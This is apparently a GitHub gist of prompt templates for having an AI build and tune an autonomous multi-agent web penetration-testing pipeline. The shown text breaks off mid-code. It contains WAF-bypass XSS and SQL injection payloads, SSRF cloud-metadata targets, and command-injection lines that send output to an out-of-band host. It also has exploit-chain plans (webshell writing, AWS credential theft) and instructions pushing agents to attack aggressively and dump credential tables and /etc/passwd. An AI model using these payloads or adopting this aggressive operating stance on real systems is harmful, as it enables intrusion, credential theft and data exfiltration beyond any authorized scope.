Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save z0rs/46f93c6c37764bf9d269f5144537fd89 to your computer and use it in GitHub Desktop.

Select an option

Save z0rs/46f93c6c37764bf9d269f5144537fd89 to your computer and use it in GitHub Desktop.

🔴 CrewAgent — Offensive AI Prompt Collection

Project: Pentest Crew — Multi-agent offensive security pipeline
Stack: Python 3.10+, CrewAI, Burp Suite MCP, 30+ attack tool modules
Philosophy: Find the vuln. Prove it. Chain it. Report it.


📋 Table of Contents

  1. Master Offensive Context Prompt
  2. Vulnerability Discovery Prompt
  3. Payload Crafting & WAF Bypass Prompt
  4. Exploit Chain Building Prompt
  5. New Attack Module Creation Prompt
  6. Agent Aggression Tuning Prompt
  7. Bug Bounty Maximization Prompt
  8. Data Exfiltration & Impact Proof Prompt
  9. Coverage Gap & Missed Attack Surface Prompt
  10. Full Pipeline Offensive Audit Prompt

1. Master Offensive Context Prompt

Paste ini sebagai pembuka setiap sesi. Ini adalah "briefing" untuk AI sebelum operasi dimulai.

You are a senior offensive security engineer and red team operator working on **Pentest Crew** — an autonomous multi-agent web application attack pipeline built on CrewAI + Burp Suite MCP.

Your job is not to detect vulnerabilities in theory. Your job is to FIND, PROVE, and CHAIN real exploits on authorized targets. Think like an attacker, operate like an engineer.

## What This Pipeline Does
Pentest Crew reads Burp Suite's live HTTP history, scope, and scanner state via MCP, then autonomously attacks the target through 8 specialist agents:

scope_discovery_agent   → enumerate hidden attack surface
http_analyst            → triage history, map high-value targets  
auth_agent              → extract sessions, test auth weaknesses
fuzzing_agent           → discover parameters, trigger anomalies
validation_executor     → ATTACK — exploit every candidate finding
lead_pentester          → score, verify, escalate confirmed findings
exploitation_agent      → post-exploitation: extract data, chain attacks
report_generator        → client-ready report with PoC scripts

## Offensive Philosophy (apply to every decision)
- **A finding without a PoC is just a theory.** Every confirmed finding needs a working request.
- **Always escalate impact.** An XSS becomes session hijack. An SSRF probes internal services. An IDOR extracts real data.
- **Chain everything.** SQLi + IDOR = full database dump. SSRF + CORS = credential theft. Don't stop at first blood.
- **The scanner is a starting point, not the answer.** Burp scanner misses logic flaws, chained attacks, and auth bypass.
- **Burp history is the treasure map.** Every endpoint with an `id=`, `token=`, `redirect=`, or JWT is a target.

## Tool Arsenal (118 total)
The `validation_executor` carries 105 attack tools covering:
- SQLi: error-based, blind, time-based, UNION, stacked queries, data extraction
- XSS: context detection, WAF bypass, DOM-based, stored via parameter pollution
- SSRF: basic, blind/OOB via Collaborator, metadata endpoints, protocol smuggling
- Auth: JWT none-alg, alg confusion, session fixation, OAuth state bypass, PKCE abuse
- Injection: command injection (blind + output extraction), XXE (OOB + billion laughs), LDAP
- Logic: race conditions, coupon bypass, mass assignment, OTP bypass, price tampering
- Access Control: Autorize session-swap (horizontal + vertical), multi-role escalation
- Advanced: request smuggling (CL.0, TE/TE, H2), prototype pollution, cache poisoning, CRLF

## Key Offensive Behaviors to Enforce
1. `validation_executor` must NEVER stop at one test case — exhaust all applicable payloads per finding
2. `exploitation_agent` runs ONLY on CONFIRMED findings — but when it runs, it extracts real data
3. `lead_pentester` must calculate CVSS 3.1 scores, not just label "High/Medium/Low"
4. `report_generator` must produce curl/Python PoC that a developer can run to reproduce instantly
5. False negatives are worse than false positives — when in doubt, try the payload

## Burp MCP Attack Surface Available
- `send_http1_request` / `send_http2_request` — replay with full mutation control
- `generate_collaborator_payload` + `poll_collaborator_with_wait` — OOB for blind vulns
- `autorize_check` / `autorize_multi_role_check` — horizontal + vertical privesc automation
- `send_to_intruder` — hand off to Burp Intruder for brute/fuzz campaigns
- `get_proxy_http_history_regex` — hunt specific patterns across all captured traffic
- `create_repeater_tab` — document attack sequences for PoC reproduction

When I ask you to work on this project, think OFFENSIVELY. The goal is maximum finding coverage with maximum impact proof.

2. Vulnerability Discovery Prompt

Gunakan ini untuk minta AI memperluas kemampuan deteksi attack surface dan menemukan finding yang missed.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Find What the Pipeline Is Missing

The current pipeline runs 118 tools across 8 agents. Assume the target has been browsed and Burp history is populated. Your job is to identify what HIGH-VALUE vulnerabilities this pipeline might MISS and fix that gap.

### Attack Surface Audit — Answer These

**1. Hidden Parameters**
The current `fuzzing_agent` uses `param_discovery` and `param_fuzzer`. But:
- Does it fuzz hidden/undocumented API parameters beyond the wordlist?
- Does it attempt parameter pollution (HPP) — same param name multiple times?
- Does it fuzz JSON body keys, not just URL params?
- Does it test path segment parameters (e.g., `/api/v1/{user_id}/settings`)?

**2. Auth & Session Weaknesses**
The `auth_agent` extracts sessions and tests auto-login. But:
- Does it test for JWT `kid` header injection (SQL injection via kid parameter)?
- Does it test for JWT `jku`/`x5u` header hijacking (point to attacker-controlled JWK Set)?
- Does it detect tokens that don't expire (long-lived JWT, no `exp` claim)?
- Does it test session invalidation after logout (replay old session token after logout)?
- Does it test for account takeover via password reset token reuse?

**3. Business Logic**
No automated tool catches these — but `lead_pentester` and `validation_executor` should attempt:
- Negative quantity/price in cart/order endpoints
- Replay of single-use tokens (password reset, email verify, OTP)
- Concurrent requests to race-condition sensitive operations (funds transfer, coupon apply)
- Skipping multi-step flow steps (jump from step 1 to step 3, bypass step 2)
- Mass assignment on user profile update (try adding `role=admin`, `is_admin=true`)

**4. OOB/Blind Vulns That Need Collaborator**
These are high-severity but often missed without OOB infrastructure:
- Blind SSRF via `redirect=`, `webhook=`, `avatar_url=`, `import_url=`, `callback=` params
- Blind command injection via time-delay AND Collaborator DNS exfil
- Blind XXE via external DTD load
- DNS rebinding for CSRF to internal services

**5. Modern API Attack Surface**
- GraphQL: introspection → field-level auth bypass → batching bypass rate limits → IDOR via node IDs
- WebSocket: does the pipeline test auth on WS handshake? Injection via WS frames?
- gRPC / Protobuf endpoints: not covered — flag as NEEDS_ESCALATION
- Server-Sent Events (SSE) endpoints: are they in scope?

### Deliverables
For each gap you identify:
1. Which agent/tool should cover it
2. Exact code change needed (new tool or modified `_run()` logic)
3. Example payload or test case
4. What a CONFIRMED finding looks like (what response delta proves exploitation)

3. Payload Crafting & WAF Bypass Prompt

Gunakan ini untuk memperkuat payload di setiap tool — terutama untuk target dengan WAF/filtering.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Harden Attack Payloads Against Real-World Defenses

The current tools use basic payloads. Real targets have WAFs (Cloudflare, Akamai, AWS WAF, ModSecurity), input filtering, and encoding validation. Upgrade the payloads.

### Target File
[SPECIFY — e.g., `src/pentest_crew/tools/xss_bypass_tools.py` or `sql_injection_tools.py`]

### Current Payload Weaknesses to Fix

**XSS (xss_bypass_tools.py)**
Current tools test basic `<script>alert(1)</script>`. Real WAFs block this.
Upgrade to include:

# Context-aware bypass payloads — use based on reflection context:
HTML_CONTEXT = [
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<!--<img src=--><img src=x onerror=alert(1)>",
]
ATTR_CONTEXT = [
    '" onmouseover=alert(1) x="',
    "' onfocus=alert(1) autofocus='",
    '" autofocus onfocus=alert(1) "',
]
JS_CONTEXT = [
    "';alert(1)//",
    "\";alert(1)//",
    "\\';alert(1)//",
    "${alert(1)}",  # template literal
]
WAF_BYPASS = [
    "<scr\x00ipt>alert(1)</scr\x00ipt>",   # null byte
    "<svg/onload=alert(1)>",                 # no space
    "<svg\tonload=alert(1)>",                # tab
    "<sCrIpT>alert(1)</sCrIpT>",            # case variation
    "%3Cscript%3Ealert(1)%3C/script%3E",   # URL encoded
    "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",  # HTML entities
    "<script>eval(atob('YWxlcnQoMSk='))</script>",    # base64
]

**SQLi (sql_injection_tools.py)**
Upgrade beyond `' OR 1=1--` to include:
```python
SQLI_WAF_BYPASS = [
    "' /*!50000OR*/ '1'='1",          # MySQL version comment
    "' OR/**/1=1--",                   # inline comment
    "' OR 0x313d31--",                 # hex encoding
    "' OR 1=1;--",                     # semicolon variation
    "%27%20OR%201%3D1--",             # URL encoded
    "' OR 'x'='x",                    # no numbers
    "admin'--",                        # direct admin bypass
    "' OR 1=1 LIMIT 1--",             # MySQL specific
    "1; SELECT SLEEP(5)--",            # time-based
    "1 UNION SELECT NULL,NULL,NULL--", # UNION base
]

# DB fingerprinting payloads (run first to choose right UNION syntax):
DB_FINGERPRINT = {
    "mysql":    "' AND SLEEP(0)--",
    "postgres": "' AND pg_sleep(0)--",
    "mssql":    "' WAITFOR DELAY '0:0:0'--",
    "oracle":   "' AND 1=UTL_INADDR.GET_HOST_ADDRESS('test')--",
    "sqlite":   "' AND typeof(1)='integer'--",
}

**SSRF (ssrf_tools.py)**
Cloud metadata endpoints vary by provider. Add:
```python
SSRF_METADATA_TARGETS = [
    # AWS
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://[fd00:ec2::254]/latest/meta-data/",  # IPv6 variant
    # GCP
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://169.254.169.254/computeMetadata/v1/",
    # Azure
    "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
    # DigitalOcean
    "http://169.254.169.254/metadata/v1/",
    # SSRF bypass techniques
    "http://0177.0.0.1/",              # Octal
    "http://0x7f000001/",              # Hex
    "http://2130706433/",              # Decimal
    "http://localhost:80@169.254.169.254/",  # URL auth bypass
    "http://169.254.169.254#@example.com/", # Fragment bypass
    "dict://169.254.169.254:80/",      # Protocol swap
    "gopher://169.254.169.254:80/_",   # Gopher
]

**Command Injection (command_injection_tools.py)**
Add OS-aware blind injection with Collaborator OOB:
```python
CMD_INJECTION_OOB = [
    # Linux (using collaborator_domain from generate_collaborator_payload)
    "`nslookup {collab}`",
    "$(nslookup {collab})",
    "| nslookup {collab}",
    "; curl http://{collab}/`whoami`",
    "& ping -c 1 {collab}",
    # Windows
    "| nslookup {collab}",
    "& nslookup {collab}",
    "; nslookup {collab}",
    "| curl http://{collab}/",
    # Encoded variants
    "`nl%73lookup {collab}`",           # URL encoded 's'
    "$(n\\slookup {collab})",           # backslash in command
]

### Output Requirements
1. Updated `_get_payloads()` or payload lists in the specified tool file
2. For each new payload, comment WHY it bypasses a specific defense
3. Detection logic update: what response delta proves the bypass payload worked?
4. Test cases: add mock responses that simulate WAF-bypassed vs WAF-blocked scenarios

4. Exploit Chain Building Prompt

Gunakan ini untuk memaksimalkan impact dari temuan yang sudah confirmed — turn 1 bug jadi full compromise.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Chain Confirmed Findings Into Maximum-Impact Exploits

Given these confirmed findings from the pipeline:
[PASTE CONFIRMED FINDINGS JSON OR DESCRIBE THEM]

Your job is to chain them into the highest-impact attack path possible.

### Chaining Logic Matrix

Apply this attack graph thinking to the findings:

| Initial Foothold | Next Step | Final Impact |
|---|---|---|
| SSRF (blind) | → probe internal services (Redis, Elasticsearch, IMDS) | → AWS credential theft, internal RCE |
| SSRF (read) | → internal admin panel access | → privilege escalation, config dump |
| SQLi (read) | → dump users table (hashed passwords) | → credential stuffing, account takeover |
| SQLi (write) | → write webshell via INTO OUTFILE | → RCE |
| XSS (stored) | → steal admin session cookie | → account takeover + admin panel access |
| XSS (reflected) | → CSRF to change admin email/password | → account takeover |
| IDOR | → access other users' PII/files | → mass data exfiltration |
| JWT alg confusion | → forge admin JWT | → full application takeover |
| Open Redirect | → phishing + OAuth token theft | → account takeover |
| CORS misconfiguration | → read authenticated API responses from attacker domain | → session data theft |
| Request Smuggling | → poison frontend cache | → reflected XSS to all users |
| Race Condition (payment) | → negative balance / free orders | → financial fraud |

### Chain Construction Task

For the findings provided:
1. **Map the attack graph**: Which findings can feed into others? Draw the dependency chain.
2. **Identify the kill chain**: What's the shortest path to highest impact (RCE, full account takeover, data exfil)?
3. **Implement chain in `exploit_chain_tools.py`**:
   - Each chain step should call the appropriate attack tool in sequence
   - Pass output of step N as input to step N+1
   - Stop chain on failure, record partial success
4. **Update `exploit_chain_correlator` logic** to automatically detect these chain patterns from the `confirmed_findings` list.
5. **Calculate combined CVSS**: A chain of Medium findings often = Critical impact. Calculate composite score.

### Output Requirements
```python
# Expected chain result structure:
{
    "chain_id": "CHAIN-001",
    "steps": [
        {"step": 1, "tool": "ssrf_basic_test", "result": "CONFIRMED", "evidence": {...}},
        {"step": 2, "tool": "ssrf_metadata_enum", "result": "CONFIRMED", "evidence": {"aws_keys": "..."}},
        {"step": 3, "tool": "ssrf_data_extraction", "result": "CONFIRMED", "evidence": {"iam_role": "..."}},
    ],
    "chain_verdict": "CRITICAL",
    "combined_cvss": "9.8",
    "attack_narrative": "SSRF at /api/import allows reading AWS IMDS → IAM credentials extracted → full AWS account compromise",
    "poc_script": "# Python PoC:\n..."
}

Implement the chain detection and execution logic end-to-end. Prioritize chains that reach RCE, full account takeover, or mass data exfiltration.

5. New Attack Module Creation Prompt

Template untuk nambah vulnerability class baru ke arsenal.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Build New Attack Module

### Vulnerability Class to Add
[SPECIFY — e.g., "OAuth 2.0 Misconfiguration", "Insecure Deserialization (Java/PHP)", "GraphQL Batching Rate Limit Bypass", "HTTP/2 Rapid Reset DoS", "WebAuthn Bypass"]

### Attack Module Requirements

**1. Coverage**: The module must test the full kill chain for this vuln class, not just detection:
   - Detection (does the vuln exist?)
   - Confirmation (can it be triggered reliably?)
   - Exploitation (what data/access can be gained?)

**2. Payload Design**:
   - Payloads must be targeted to the specific endpoint type (JSON API, form, header, etc.)
   - Include WAF bypass variants for each payload
   - OOB via Collaborator for blind variants (always generate payload BEFORE sending request)
   - Payloads bounded to max 10 per test run — no brute force loops

**3. File Structure**:
```python
"""
<vuln>_tools.py — <Vulnerability Class> attack module
Attack surface: <describe where this vuln lives>
Kill chain: <detection step> → <confirmation step> → <exploitation step>
"""
from crewai.tools import BaseTool
from pentest_crew.tools.burp_mcp_client import get_client


class <Vuln>DetectTool(BaseTool):
    """Step 1: Detect if the vulnerability class exists at all."""
    name = "<vuln>_detect"
    description = "..."
    
    def _run(self, target_url: str, **kwargs) -> dict:
        # Fast detection — minimum requests, clear signal
        # Return CONFIRMED / NOT_CONFIRMED / INCONCLUSIVE
        ...


class <Vuln>ExploitTool(BaseTool):
    """Step 2: Exploit the confirmed vulnerability for maximum impact."""
    name = "<vuln>_exploit"
    description = "..."
    
    def _run(self, target_url: str, confirmed_param: str, **kwargs) -> dict:
        # Only called AFTER detection confirms the vuln
        # Extract real data / gain real access
        # Return proof of exploitation with actual data
        ...


class <Vuln>OOBTool(BaseTool):
    """Step 3: Blind/OOB variant using Burp Collaborator for non-reflected vulns."""
    name = "<vuln>_oob"
    description = "..."
    
    def _run(self, target_url: str, **kwargs) -> dict:
        client = get_client()
        # ALWAYS: generate collaborator payload FIRST
        collab = client.call_with_retry("generate_collaborator_payload", {})
        collab_domain = collab.get("payload", "")
        # Send attack with collab domain embedded
        ...
        # Poll for interactions AFTER sending
        interactions = client.call_with_retry("poll_collaborator_with_wait", {
            "payload": collab_domain,
            "wait_seconds": int(os.getenv("COLLABORATOR_WAIT_SECS", "30"))
        })
        return self._verdict(interactions)

**4. Registration** (required steps after creating the file):
```python
# In tools/__init__.py — add:
from pentest_crew.tools.<vuln>_tools import <Vuln>DetectTool, <Vuln>ExploitTool, <Vuln>OOBTool

vuln_detect = <Vuln>DetectTool()
vuln_exploit = <Vuln>ExploitTool()
vuln_oob = <Vuln>OOBTool()

# Add to EXECUTOR_TOOLS list
# Add to TOOL_CATEGORIES: "<vuln>": [vuln_detect, vuln_exploit, vuln_oob]

**5. agents.yaml update**: Add the new category to `validation_executor`'s backstory so it knows to use these tools when analyst finds relevant indicators.

**Deliver the complete attack module** with all three tool classes, registration, yaml update, and 3 test cases (confirmed, not confirmed, OOB hit).

6. Agent Aggression Tuning Prompt

Gunakan ini untuk membuat agent lebih agresif, exhaustive, dan tidak berhenti di temuan pertama.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Tune Agents for Maximum Coverage and Aggression

Review `config/agents.yaml` and `config/tasks.yaml`. The current configuration is too conservative in these areas. Fix them.

### Problems to Fix in agents.yaml

**Problem 1: validation_executor stops too early**
Current backstory says "Execute max 5 targeted test cases." That's fine for quick wins, but for high-value endpoints (payment, admin, user management), 5 tests miss chained/encoded bypass variants.

Fix: Change the execution logic to:
```yaml
# For LOW-VALUE endpoints (search, display, info):
  - Execute max 5 test cases, stop on CONFIRMED
  
# For HIGH-VALUE endpoints (auth, payment, admin, file upload, URL fetch):
  - Execute FULL payload suite for applicable vuln classes
  - High-value signals: id= in params, /admin/, /payment/, /upload/, JWT in header,
    role= or user_id= in body, price= or amount= in body, url= or redirect= in body
  - Do NOT stop at first CONFIRMED — continue to test all applicable vuln classes
  - Log each test with verdict before moving to next

**Problem 2: exploitation_agent is too cautious**
Current backstory only does "post-confirmation data extraction" with minimal payloads.

Fix: Make it explicit that when a finding is CONFIRMED:
```yaml
# exploitation_agent must attempt:
- For SQLi: extract DB version, user(), database(), then enumerate tables, then dump users/credentials table
- For SSRF: probe 169.254.169.254 (AWS), metadata.google.internal (GCP), then internal network 10.x.x.x scan
- For IDOR: access 5 different object IDs (victim-1, victim+1, random IDs) to prove mass exposure
- For JWT forgery: forge admin-level token and access /admin, /api/admin, /dashboard
- For Command Injection: execute `id`, `whoami`, `hostname`, `cat /etc/passwd` (non-destructive)
- Stop only when: max_extraction_steps=10 reached, OR connection drops, OR server returns 429

**Problem 3: lead_pentester doesn't calculate CVSS properly**
Fix tasks.yaml `qa_review_task`:
```yaml
# Required for every CONFIRMED finding:
- Calculate CVSS 3.1 base score with explicit vector string
  Format: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
- Map Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, CIA impact
- Never just say "High" — always include vector string and numeric score
- For chains: calculate the COMBINED score (the chain that reaches most impact)

**Problem 4: scope_discovery_agent is passive**
Fix: Make it actively enumerate beyond robots.txt/sitemap. Add to backstory:
```yaml
# scope_discovery_agent must ALSO attempt:
- Enumerate /api/v1/, /api/v2/, /v1/, /v2/ path variations
- Try /.git/config, /.env, /backup.zip, /config.yml for exposed secrets
- Fetch all JS files and extract: hardcoded URLs, API keys, internal endpoints, S3 bucket names
- Test all found subdomains for same-origin vulnerabilities
- Look for admin panels: /admin, /administrator, /wp-admin, /manager, /console
- Identify technology stack (WAF type, server, framework) for targeted attack planning

### Deliverables
1. Updated `config/agents.yaml` — rewrite backstory sections for the 4 agents above
2. Updated `config/tasks.yaml` — tighten expected_output to require CVSS vector strings
3. Explain how each change increases finding yield or impact depth

7. Bug Bounty Maximization Prompt

Khusus untuk bug bounty context — maximize P1/Critical finding rate.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Tune Pipeline for Maximum Bug Bounty Payout

Bug bounty programs pay based on severity and impact. Tune the pipeline to find P1/Critical findings that justify maximum payouts.

### High-Payout Target Patterns — Add These to http_analyst Triage

The `http_analyst` must prioritize these endpoint signatures as HIGH PRIORITY candidates:

```python
# P1 / Critical signal patterns — always escalate to full validation
CRITICAL_SIGNALS = {
    "account_takeover": [
        r"password[-_]?reset", r"forgot[-_]?password", r"change[-_]?email",
        r"verify[-_]?token", r"confirm[-_]?token", r"activate[-_]?account",
        r"oauth.*callback", r"auth.*code=", r"access_token=",
    ],
    "idor_high_value": [
        r"user[_-]?id=\d+", r"account[_-]?id=\d+", r"uid=\d+",
        r"invoice[_-]?id=\d+", r"order[_-]?id=\d+", r"payment[_-]?id=\d+",
        r"document[_-]?id=\d+", r"file[_-]?id=\d+", r"report[_-]?id=\d+",
    ],
    "rce_surface": [
        r"exec=", r"command=", r"cmd=", r"system=", r"run=",
        r"import.*url=", r"webhook=", r"callback=", r"ping=",
        r"template=", r"render=", r"pdf.*url=", r"screenshot.*url=",
    ],
    "privilege_escalation": [
        r"/admin/", r"/superuser/", r"/internal/", r"/staff/",
        r"role=", r"is_admin=", r"privilege=", r"permission=",
        r"sudo=", r"elevated=",
    ],
    "mass_data_exfil": [
        r"/export", r"/download", r"/bulk", r"/report",
        r"format=csv", r"format=xlsx", r"limit=\d{4,}", # large limit values
    ]
}

### Scoring for Bug Bounty Triage

Add a payout-potential score to each finding candidate:
```python
BOUNTY_SCORE = {
    "rce":                   10,  # Almost always P1 ($10k-$30k+)
    "account_takeover":       9,  # P1 ($5k-$20k)
    "sqli_with_exfil":        9,  # P1 if PII/credentials exposed
    "auth_bypass_to_admin":   9,  # P1
    "ssrf_internal":          8,  # P1 on cloud-hosted apps
    "idor_mass_exposure":     8,  # P1 if PII at scale
    "jwt_admin_forge":        8,  # P1
    "stored_xss_admin":       7,  # P2 ($1k-$5k)
    "request_smuggling":      7,  # P2 on well-known programs
    "open_redirect_oauth":    6,  # P2 when combined with OAuth
    "reflected_xss":          5,  # P3 ($200-$1k)
    "idor_single":            5,  # P3 unless sensitive data
    "cors_with_credentials":  5,  # P3 
    "info_disclosure":        3,  # P4 / Informational
}

### Auto-Escalation Rules

Add to `lead_pentester` QA review logic:

IF finding is IDOR AND affected_data contains [PII | credentials | payment_info]:
    → escalate to P1, require exploitation_agent to extract 5 real records as proof

IF finding is XSS AND injection_point is [stored | admin_panel | email_template]:
    → escalate from P3 to P1, require session hijack PoC

IF finding is SSRF AND server is [AWS | GCP | Azure]:
    → require metadata endpoint probe as next step (169.254.169.254 or equivalent)

IF finding is SQLi AND db_type is [MySQL | PostgreSQL]:
    → require dump of users/accounts table (first 3 rows, redacted) as impact proof

IF finding is Open_Redirect AND OAuth_flow_detected:
    → test redirect_uri hijacking for token theft, escalate to P1 if successful

### PoC Quality Standards

The `report_generator` must produce PoC that meets HackerOne/Bugcrowd submission standards:
```markdown
## Proof of Concept

**Step 1**: Log in as a regular user (test@example.com / password123)

**Step 2**: Send the following request (curl):

curl -X POST 'https://target.com/api/user/profile' \
  -H 'Authorization: Bearer <your_session_token>' \
  -H 'Content-Type: application/json' \
  -d '{"user_id": 1337, "action": "view"}'

**Step 3**: Observe that the response returns user data for user_id 1337 (admin), 
not the authenticated user. This confirms broken object-level authorization.

**Expected Response** (vulnerable):
```json
{"user_id": 1337, "email": "admin@target.com", "role": "admin"}

**Impact**: An attacker can enumerate all user accounts and access their PII 
by incrementing user_id. Estimated exposed records: ~50,000 users.

Implement all of the above as concrete code changes to `http_analyst` triage logic, `lead_pentester` escalation rules, and `report_generator` PoC template.

8. Data Exfiltration & Impact Proof Prompt

Gunakan ini untuk memastikan exploitation_agent benar-benar mengekstrak data sebagai bukti impact.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Maximize Impact Proof via Data Extraction

The `exploitation_agent` must prove impact with REAL data, not theoretical descriptions. Review and upgrade `exploitation_tools.py`.

### What Counts as Proof (by vuln class)

**SQLi Proof Standard**:
```python
# NOT sufficient: "SQLi confirmed via error message"
# REQUIRED:
{
    "vuln": "SQL Injection",
    "db_version": "MySQL 8.0.32",
    "db_user": "webapp@localhost", 
    "db_name": "production_db",
    "tables_found": ["users", "orders", "payment_methods"],
    "sample_data": {
        "users_table_row_count": 47832,
        "sample_email": "re***@example.com",  # redacted but proves access
        "has_password_hashes": True,
        "has_pii": True
    },
    "extraction_query": "SELECT version(), user(), database()",
    "cvss": "9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}

**IDOR Proof Standard**:
```python
# Test at least 3 object IDs: victim_id-1, victim_id+1, random ID
# Required proof:
{
    "vuln": "IDOR - Broken Object Level Authorization",
    "tested_ids": [1001, 1002, 1003, 9999],
    "accessible_ids": [1001, 1002, 1003],  # IDs that returned data
    "exposed_data_fields": ["email", "phone", "address", "order_history"],
    "estimated_exposure": "All user records accessible (enumerable sequential IDs)",
    "sample_record": {"id": 1001, "email": "re***@example.com"}  # partial redaction
}

**SSRF Proof Standard**:
```python
# Cloud metadata — must probe actual IMDS endpoints
{
    "vuln": "SSRF - Cloud Metadata Exposure",
    "cloud_provider": "AWS",
    "imds_accessible": True,
    "sensitive_data_found": {
        "iam_role": "production-webapp-role",
        "access_key_id": "ASIA...XXXX",  # first 4 + last 4 only
        "token_expiry": "2026-05-02T18:30:00Z"
    },
    "impact": "Full AWS API access using stolen IAM credentials"
}

**JWT Forgery Proof Standard**:
```python
{
    "vuln": "JWT Algorithm Confusion - None Bypass",
    "original_token_role": "user",
    "forged_token_role": "admin",
    "forged_token": "eyJ...<forged>",
    "admin_endpoint_accessed": "/api/admin/users",
    "admin_response_preview": '{"users": [...], "total": 4921}',
    "impact": "Full admin access without credentials"
}

### Implement Missing Extraction Logic

Review `exploitation_tools.py` and add/fix:
1. `sql_data_extraction` — must execute multi-step: fingerprint → table enum → row dump
2. `idor_data_extraction` — must iterate min 3 IDs, return all accessible data fields  
3. `ssrf_data_extraction` — must try cloud IMDS AND internal network probe (10.x.x.x:8080 common admin ports)
4. `generic_data_extract` — fallback for novel exploit types, captures response diff vs baseline

Each extraction tool must:
- Accept `max_records=5` parameter (never extract more than needed for proof)
- Redact the last 80% of sensitive values (PII, keys) — show enough to prove access, not full dump
- Return `impact_statement` string suitable for direct copy-paste into bug report

Implement all changes with tests.

9. Coverage Gap & Missed Attack Surface Prompt

Gunakan ini untuk audit blind spot pipeline — apa yang belum dicover sama sekali.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Find the Blind Spots — What Attacks Are We Missing?

Audit all 118 tools + 8 agent configurations against the OWASP WSTG v4.2 and common bug bounty high-payout categories. Produce a gap report.

### Known WSTG Test Cases — Check Coverage

Go through each WSTG test ID and map it to an existing tool (or flag as MISSING):

WSTG-INFO-01: Conduct Search Engine Discovery      → scope_discovery_agent (robots, sitemap) ✓
WSTG-INFO-02: Fingerprint Web Server               → favicon_fingerprint_tool ✓
WSTG-INFO-03: Review Web Server Metafiles          → robots_sitemap_tool ✓
WSTG-INFO-04: Enumerate Web Server Applications    → path_enumeration_tool ✓
WSTG-INFO-05: Review Web Page Content              → js_file_analyzer ✓
WSTG-INFO-06: Identify Application Entry Points    → http_analyst ✓
WSTG-INFO-07: Map Execution Paths                  → ? (check coverage)
WSTG-INFO-08: Fingerprint Web App Framework        → ? (check coverage)
WSTG-INFO-09: Fingerprint Web App                  → ? (check coverage)
WSTG-INFO-10: Map App Architecture                 → ? (check coverage)
WSTG-CONF-01: Network/Infrastructure Config        → ? (check coverage)
WSTG-CONF-02: App Platform Config                  → ? (check coverage)
WSTG-CONF-03: File Extension Handling              → MISSING — file upload testing limited
WSTG-CONF-04: Review Backup and Unreferenced Files → scope_discovery (partial) — improve?
WSTG-CONF-05: Enumerate Infrastructure             → MISSING — no cloud infra enumeration
WSTG-CONF-06: HTTP Methods                         → ? (are OPTIONS/PUT/DELETE tested?)
WSTG-CONF-07: HTTP Strict Transport Security       → ? (are security headers checked?)
WSTG-CONF-08: RIA Cross Domain Policy              → redirect_and_cors_tools ✓
WSTG-CONF-09: File Permission                      → MISSING
WSTG-CONF-10: Subdomain Takeover                   → dns_enumeration_tool (partial)
WSTG-CONF-11: Cloud Storage                        → s3_bucket_tools ✓
...
[Continue for all WSTG test IDs]

### High-Payout Bug Classes NOT in Current Pipeline

Identify which of these are completely uncovered and suggest implementation priority:

1. **Subdomain Takeover** — DNS points to expired/unclaimed service (Heroku, GitHub Pages, etc.)
   - Missing: active check of CNAME targets for dangling DNS
   - Priority: HIGH (P2-P1 on most programs)

2. **File Upload RCE** — upload PHP/JSP/ASPX disguised as image
   - Current: no file upload testing module exists
   - Priority: CRITICAL

3. **Deserialization** — Java ObjectInputStream, PHP unserialize, Python pickle
   - Current: no deserialization module
   - Priority: HIGH

4. **Template Injection (SSTI)** — `{{7*7}}` → `49` in Jinja2, Twig, Freemarker
   - Current: missing SSTI-specific tooling (fuzzing picks up some)
   - Priority: HIGH (often leads to RCE)

5. **Host Header Injection** → in redirect_and_cors_tools (partial) — is password reset via host header covered?
   - Verify: does the tool test host header in password reset flow specifically?

6. **2FA/OTP Bypass** — brute force, token reuse, response manipulation
   - Current: business_logic_tools has OTP bypass partially
   - Gap: response manipulation bypass (change `"success": false` to `true`)

7. **GraphQL Subscription** — event-driven data exposure via WS-based subscription
   - Current: graphql_security_tools covers queries/mutations but not subscriptions

8. **HTTP/2 Cleartext (h2c) Upgrade** — server accepts h2c upgrade on internal ports
   - Missing: no h2c upgrade testing

### Deliverables
For each gap identified:
1. Severity and typical bug bounty payout range
2. Minimal implementation plan (new tool class + estimated LoC)
3. Which existing agent should own the new tool
4. Sample test case showing CONFIRMED detection
5. Prioritized implementation backlog (Critical → High → Medium)

10. Full Pipeline Offensive Audit Prompt

Grand finale — full end-to-end audit dari perspektif red teamer: apakah pipeline ini benar-benar bisa dipakai operasi pentest nyata?

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Full Red Team Audit of the Pentest Pipeline Itself

You are red-teaming the Pentest Crew pipeline. Not the target — the TOOL. Your job: find where the pipeline would fail, miss findings, produce false negatives, or underperform in a real engagement.

### Scenario 1: Target with Heavy WAF (Cloudflare / Akamai)
Simulate what happens when every payload is blocked with HTTP 403:
- Does `validation_executor` retry with WAF bypass variants, or give up after first blocked request?
- Does any agent detect "we're behind a WAF" and switch to stealthier payloads?
- Does stealth mode (STEALTH_MODE=true) actually help, or just add delay?
- What's the minimum payload set that would evade common WAF rule sets?

Fix: Add WAF detection logic to `burp_output_sanitizer.py` or a new `waf_detection_tool`:
```python
WAF_INDICATORS = [
    ("cloudflare", re.compile(r"cloudflare|cf-ray|__cfduid", re.I)),
